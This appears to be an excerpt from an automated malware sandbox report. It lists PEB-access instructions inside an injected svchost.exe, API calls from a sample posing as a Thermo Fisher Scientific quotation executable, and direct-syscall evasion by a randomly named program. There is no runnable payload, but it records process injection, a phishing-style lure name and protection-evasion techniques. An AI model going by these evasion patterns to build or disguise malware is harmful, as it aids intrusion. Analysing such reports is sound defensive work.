                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h] | 2_2_03B5EBFC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h] | 2_2_03BBCBF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h] | 2_2_03BDEBD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h] | 2_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h] | 2_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h] | 2_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h] | 2_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h] | 2_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h] | 2_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h] | 2_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h] | 2_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h] | 2_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h] | 2_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h] | 2_2_03B2CB7E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h] | 2_2_03BDEB50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h] | 2_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h] | 2_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h] | 2_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h] | 2_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h] | 2_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h] | 2_2_03BD8B42
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h] | 2_2_03B86AA4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h] | 2_2_03B68A90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h] | 2_2_03C04A80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h] | 2_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h] | 2_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03B30AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h] | 2_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h] | 2_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h] | 2_2_03B6CA38
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h] | 2_2_03B6CA24
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h] | 2_2_03B5EA2E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h] | 2_2_03BBCA11
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h] | 2_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h] | 2_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h] | 2_2_03BDEA60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h] | 2_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h] | 2_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h] | 2_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h] | 2_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h] | 2_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h] | 2_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h] | 2_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h] | 2_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h] | 2_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_03BBE9E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h] | 2_2_03B649D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_03BFA9D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h] | 2_2_03BC69C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h] | 2_2_03BB892A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h] | 2_2_03BC892B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h] | 2_2_03BBC912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h] | 2_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h] | 2_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h] | 2_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h] | 2_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h] | 2_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h] | 2_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h] | 2_2_03BBC97C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h] | 2_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h] | 2_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h] | 2_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h] | 2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h] | 2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h] | 2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h] | 2_2_03BB0946
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C008C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h] | 2_2_03BBC89D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h] | 2_2_03B30887
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h] | 2_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h] | 2_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h] | 2_2_03BFA8E4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h] | 2_2_03B5E8C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] | 2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] | 2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] | 2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h] | 2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] | 2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] | 2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A830 mov eax, dword ptr fs:[00000030h] | 2_2_03B6A830
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h] | 2_2_03BD483A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h] | 2_2_03BD483A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC810 mov eax, dword ptr fs:[00000030h] | 2_2_03BBC810
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h] | 2_2_03BBE872
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h] | 2_2_03BBE872
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h] | 2_2_03BC6870
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h] | 2_2_03BC6870
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60854 mov eax, dword ptr fs:[00000030h] | 2_2_03B60854
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h] | 2_2_03B34859
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h] | 2_2_03B34859
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B42840 mov ecx, dword ptr fs:[00000030h] | 2_2_03B42840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04FE7 mov eax, dword ptr fs:[00000030h] | 2_2_03C04FE7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h] | 2_2_03B62F98
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h] | 2_2_03B62F98
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0063A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_0063A66C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_006281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_006281AC
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00628189 SetUnhandledExceptionFilter, | 0_2_00628189

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
